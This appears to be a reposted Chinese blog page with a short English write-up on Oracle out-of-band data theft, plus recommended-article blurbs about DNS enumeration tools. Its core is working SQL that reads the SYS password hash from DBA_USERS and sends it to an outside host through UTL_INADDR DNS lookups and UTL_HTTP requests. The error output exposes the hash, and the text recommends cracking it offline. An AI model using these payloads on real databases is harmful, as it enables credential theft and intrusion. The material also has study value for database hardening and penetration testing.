DNS/HTTP Enumeration in oracle

最新推荐文章于 2025-12-03 18:58:29 发布
最新推荐文章于 2025-12-03 18:58:29 发布 · 77 阅读 · 0
文章标签:

#数据库 #运维

默认ORACLE密码

Default Oracle Passwords

http://www.vulnerabilityassessment.co.uk/default_oracle_passwords.htm

Oracle has a couple of stored procedures that can be manipulated to enumerate sensitive application system information. You are basically using Oracles in-built web services against itself. This was demonstrated at the Blackhat Breaking into Oracle Server class given by David Litchfield of NGS Software. The procedures in question are:

  • UTL_HTTP.REQUEST

  • UTL_INADDR.GET_HOST_ADDRESS

Abusing normal DNS and HTTP requests from a normal SQL prompt it may be possible to gain passwords hashes etc:

SQL> SELECT UTL_INADDR.GET_HOST_ADDRESS((SELECT PASSWORD FROM DBA_USERS WHERE US
ERNAME='SYS')||'.vulnerabilityassessment.co.uk') FROM DUAL;
SELECT UTL_INADDR.GET_HOST_ADDRESS((SELECT PASSWORD FROM DBA_USERS WHERE USERNAM
E='SYS')||'.vulnerabilityassessment.co.uk') FROM DUAL
*
ERROR at line 1:
ORA-29257: host D3AAEDA7EDA1B4AA.vulnerabilityassessment.co.uk unknown
ORA-06512: at "SYS.UTL_INADDR", line 19
ORA-06512: at "SYS.UTL_INADDR", line 40
ORA-06512: at line 1

and

SQL> select utl_http.request('http://gladius:5500/'||(SELECT PASSWORD FROM DBA_U
SERS WHERE USERNAME='SYS')) from dual;

UTL_HTTP.REQUEST('HTTP://GLADIUS:5500/'||(SELECTPASSWORDFROMDBA_USERSWHEREUSERNA

--------------------------------------------------------------------------------

<HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>404 Not Found</H1>Resou

rce /D3AAEDA7EDA1B4AA not found on this server</BODY></HTML>

In both examples above the SYS password is very nicely provided to us which can then be cracked offline with tools such as Cain etc.

iteye_11341
关注
14、域名系统深入探索与信息收集
xxx12的博客
06-17 50
本文深入探讨了DNS系统及其在网络安全中的重要性,重点介绍了端口扫描、DNS查询、数据包嗅探、信息泄露检测、区域传输请求等信息收集技术。通过使用Nmap、Dig、Nslookup、Wireshark等工具,可以获取目标域名的服务器信息、IP地址、邮件服务器、BIND版本等关键信息,并利用Fierce、Dnsrecon等工具进行DNS枚举和主机名爆破。文章还分析了如何利用收集到的信息识别潜在漏洞、构建网络拓扑,并提出了针对网络管理员和安全测试人员的建议,展望了DNS安全技术的未来发展趋势。
DNS枚举(渗透利器) DNSenum,fierce,dnswalk,dnstracer
weixin_58660073的博客
06-07 1909
DNS枚举工具 DNSenum,fierce,dnswalk,dnstracer DNSenum 介绍: DNSenum是一款dns查询工具。它能够通过Google或字典文件猜测可能存在的域名,并对一个网段进行反向查询。它不仅可以查询网站的主机地址信息,域名服务器和邮件交换记录,还可以在域名服务器上执行axfr(区域传送)请求,然后通过Google脚步得到扩展域名信息,提取子域名并查询,最后计算IP地址并执行whois查询,执行反向查询,把地址写入文件。 常用选项: -enum --..
DNS区域传输、DNS字典爆破、DNS注册信息
热门推荐
含笑
05-17 1万+
我们可以利用DNS区域传输来查看目标的记录,首先我们要先知道一个域名服务器,因为域名服务器有所有主机的记录,dig @域名服务器 域 传输方法axfr(AXFR请求,是从DNS服务器请求在主DNS服务器上更新信息的一类域名系统的请求。) 我们先挑选一个ns记录,来进行区域传输;root@kali:~# dig @ns2.sina.com sina.com axfr ;; Connectio
java JNDI 自己指定DNS服务器解析域名IP
jaylong35的专栏
06-14 7284
目标: 1、自己指定域名服务器 2、指定多域名服务器 3、获取所有IP 实现参考: JNDI http://docs.oracle.com/javase/1.4.2/docs/guide/jndi/jndi-dns.html http://mindprod.com/jgloss/dns.html 详细参考自己查看 实现: /** *
Hacking/Penetrating tester bookmark collection
whyrookie的博客
08-27 779
Blogs http://carnal0wnage.blogspot.com/ http://www.mcgrewsecurity.com/ http://www.gnucitizen.org/blog/ http://www.darknet.org.uk/ http://spylogic.net/ http://taosecurity.blogspot.com/ http://www.room362.com/ http://blog.sipvicious.org/ http://blog.por...
9.6. 漏洞利用/检测
Sumarua的博客
07-31 2907
文章目录9.6. 漏洞利用/检测9.6.1. 数据库注入9.6.2. 非结构化数据库注入9.6.3. 数据库漏洞利用9.6.4. XSS9.6.5. SSRF9.6.6. 模版注入9.6.7. 命令注入9.6.8. PHP9.6.9. LFI9.6.10. struts9.6.11. CMS9.6.12. Java框架9.6.13. DNS相关漏洞9.6.14. DNS数据提取9.6.15. DNS 隧道9.6.16. DNS Shell9.6.17. XXE9.6.18. 反序列化9.6.19. JNDI
vulhub打靶第一周
qq_64201116的博客
06-02 829
title: vulhub打靶第一周description: vulhub打靶第一周 难度:middle。
Oracle VM VirtualBox R ? Programming Guide and Reference
yangjia_cheng的博客
03-23 5596
Oracle VMVirtualBoxR ?Programming Guide andReferenceVersion 5.2.8c ? 2004-2018 Oracle Corporationhttp://www.virtualbox.orgContents1 Introduction 211.1 Modularity: the building blocks of VirtualBox . ....
40.网络安全渗透测试—[穷举篇3]—[KALI的Metasploit穷举模块的使用]
qwsn
08-06 2832
一、Metasploit的相关概念/下载地址/安装配置步骤 1、Metasploit相关概念: 2、Windows-Metasploit下载地址: 3、安装步骤: 4、配置步骤: 5、无需配置: 二、Kali Metasploit 穷举模块的使用 1、kali打开工具的方法:`msfconsole` 2、部分穷举模块:`auxiliary/scanner目录下` 3、用法示例:`以mysql为例` 三、Windows Metasploit 穷举模块的使用 四、`所有的穷举模块`
使用SQLMonitor监视访问ORACLE的“服务”
tanwen1234的专栏
04-19 1万+
  以前使用SQLMonitor抓捕“应用程序”访问ORACLE的SQL语句,用起来比较爽……这次遇到的应用是以WINDOWS服务的方式来运行的,尝试了一下SQLMonitor的监视服务功能,报错:error 2 installing monitor for the service process  到网上搜索解决方法,提到SQLMonitor缺少“unidbsrv.dll”文件。我用的是SQLMoniter2.4.3.6,到网上下载了个以前版本的DLL文件,尝试 依然报错:error 193 instal
安全大模型以及训练数据集
全网120W+关注AI拉呱,专注人工智能以及科技前沿!
05-21 706
安全大模型和数据集
Redis服务安装自启动(Windows版)
2509_94199043的博客
11-29 877
一般来说,一些中大型企业都会去采用 Linux 服务器来部署 Redis,而且 Redis 官方并没有提供 [Windows 版本](https://gitcode.com/gh_mirrors/wi/windows/overviewutm_source=highlight_word_gitcode&word=windows&isLogin=1 "Windows 版本")的安装包。
MySQL数据库的数据文件保存在哪?MySQL数据存在哪里
2509_94083514的博客
11-30 769
在安装好MySQL数据库使用一段时间后,会产生许多的数据库和数据。那这些数据库的数据文件存放在本地文件夹的什么位置呢一、默认位置MySQL创建的数据库实际上存储在文件系统的一个特定目录中,该目录通常为MySQL的数据目录。这个目录的默认位置依据操作系统和MySQL的安装方式不同而有所差异。、这个目录通常位于,它可能位于是个隐藏文件夹)**其中“X.X”是MySQL的版本号。目录(每个数据库都有一个与其同名的文件夹,而这个文件夹中包含了该数据库的所有表的文件,而其中的文件代表了数据库中的表。
【免费云平台部署指南】按场景选型+全维度对比(附直达地址)
分享技术干货,聚焦AI前沿科技
12-03 544
免费云平台已能覆盖从静态网站到AI模型部署的大部分场景,核心是根据项目类型(静态/后端/AI)、访问地区(国内/国外)和功能需求(数据库/容器/GPU)选择适配平台。新手建议从简单场景入手(如GitHub Pages部署博客、Hugging Face Spaces部署AI Demo),熟悉后再尝试全栈或容器化部署。
redis基本类型 5种基本类型
yeshihouhou的博客
11-30 258
List的另一个应用就是消息队列,可以利用List的 PUSH 操作,将任务存放在List中,然后工作线程再用 POP 操作将任务取出进行执行。我们在谈基础数据结构时,讨论的是存储值的数据类型,主要包括常见的5种数据类型,分别是:String、List、Set、Zset、Hash。Redis hash 是一个 string 类型的 field(字段) 和 value(值) 的映射表,hash 特别适合用于存储对象。Redis 中集合是通过哈希表实现的,所以添加,删除,查找的复杂度都是 O(1)。
我们来学mysql -- undo log系列归档
一起学Coding
12-01 177
undo log系列归档
【开题答辩全过程】以 基于Javaweb的电动汽车充电桩管理系统为例,包含答辩的问题和答案
最新发布
shiji9932的博客
12-03 324
本文介绍了一位14年经验的技术专家可提供的毕设支持服务,包括Java、Python等多语言项目开发与答辩指导。重点展示了一个"电动汽车充电桩管理系统"的答辩案例,详细说明了系统功能(预约管理、费用计算等)、技术实现(SpringBoot+Vue+MySQL)及关键问题解决方案(如预约冲突处理、断电检测机制)。文中提供了答辩问答实录,展现了从选题背景到技术细节的完整答辩过程,并附有评委的正面评价。最后建议学生可参考往届真实开题报告,提供选题指导、源码参考等服务,强调独立完成的重要性,同时表
我们来学mysql -- 怎样才能把“数据页”联系起来
一起学Coding
12-01 175
mysql数据页之间的关系
case "java/net/NetworkInterface->getNetworkInterfaces()Ljava/util/Enumeration;":{ } 这个环境怎么补
09-08
@Pointcut("execution(java.util.Enumeration java.net.NetworkInterface.getNetworkInterfaces())") public void networkInterfacePointcut() {} @Before("networkInterfacePointcut()") public void ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值